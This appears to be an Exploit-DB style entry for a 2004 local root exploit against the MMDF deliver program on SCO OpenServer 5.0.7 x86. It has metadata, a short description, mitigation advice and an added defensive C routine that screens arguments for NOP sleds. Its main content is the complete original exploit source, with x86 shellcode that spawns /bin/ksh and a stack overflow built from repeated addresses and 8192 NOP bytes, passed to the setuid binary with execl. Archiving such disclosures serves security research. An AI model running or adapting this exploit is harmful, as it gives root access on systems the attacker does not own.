Vendor: OpenServer
By: Ramon de Carvalho Valle
CVSS: 7.5 (HIGH)
Local Root Exploit
CWE: 119
Product Name: OpenServer
Affected Version From: SCO OpenServer 5.0.7 x86
Affected Version To: SCO OpenServer 5.0.7 x86
Patch Exists: NO
Related CWE:
CPE: o:caldera:openserver:5.0.7
Metasploit:
Other Scripts:
Platforms Tested:
2004

MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86

This exploit gains root access on SCO OpenServer 5.0.7 x86 systems through the MMDF deliver program. It takes advantage of a buffer overflow in the program to execute arbitrary shellcode and escalate privileges to root. The exploit code builds an oversized -c argument (a repeated address, a run of 0x90 padding bytes, then 36 bytes of shellcode that starts /bin/ksh) and passes it to /usr/mmdf/bin/deliver with execl. The exploit was published on milw0rm.com in 2004 by Ramon de Carvalho Valle.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of SCO OpenServer that addresses the buffer overflow vulnerability in the MMDF deliver program. Additionally, restricting access to the vulnerable program and implementing strong access controls can help reduce the risk of exploitation.
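With no patch listed, one compensating control is to screen arguments before they reach the privileged binary. The following is an added example, not code from the original page or from MMDF: the function names, the 1024-byte limit, the 16-byte NOP-run threshold and the "-clocal" option value are assumptions, and the sample input is constructed with an inert marker in place of any payload.

```c
#include <stdio.h>
#include <string.h>

/* Assumed policy values; neither comes from the page or from MMDF. */
#define MAX_ARG_LEN 1024   /* longest argument accepted             */
#define MAX_NOP_RUN 16     /* longest tolerated run of 0x90 bytes   */

enum arg_verdict { ARG_OK, ARG_TOO_LONG, ARG_NON_PRINTABLE, ARG_NOP_SLED };

/* Screen one argv string before it reaches a privileged program. */
enum arg_verdict screen_arg(const char *arg)
{
    size_t len = strlen(arg), run = 0, i;
    enum arg_verdict v = ARG_OK;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)arg[i];
        run = (c == 0x90) ? run + 1 : 0;
        if (run > MAX_NOP_RUN)
            return ARG_NOP_SLED;           /* most specific finding wins */
        if (c < 0x20 || c > 0x7e)
            v = ARG_NON_PRINTABLE;
    }
    if (v == ARG_OK && len > MAX_ARG_LEN)
        v = ARG_TOO_LONG;
    return v;
}

/* Constructed input with the layout used on this page: "-c", `filler`
 * bytes where the address is repeated, `nops` bytes of 0x90, then an
 * inert "XXXX" marker standing in for the payload. */
enum arg_verdict screen_sample(size_t filler, size_t nops)
{
    static char buf[16384];
    char *p = buf;

    if (filler + nops > sizeof buf - 7)
        return ARG_TOO_LONG;               /* would not fit the test buffer */
    memcpy(p, "-c", 2);       p += 2;
    memset(p, 'A', filler);   p += filler;
    memset(p, 0x90, nops);    p += nops;
    memcpy(p, "XXXX", 5);                  /* includes the terminating NUL */
    return screen_arg(buf);
}

int main(void)
{
    printf("page layout : %d\n", screen_sample(5120, 8192)); /* ARG_NOP_SLED */
    printf("short option: %d\n", screen_arg("-clocal"));     /* ARG_OK */
    return 0;
}
```

A filter like this only helps where every invocation passes through it, and it does not replace bounds checking inside the program itself.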
Source

Exploit-DB raw data:

/*
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle
 *
 */

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */
;

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    sprintf(buffer,"-c");
    p=buffer+2;
    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p=0;

    execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}



// milw0rm.com [2004-10-26]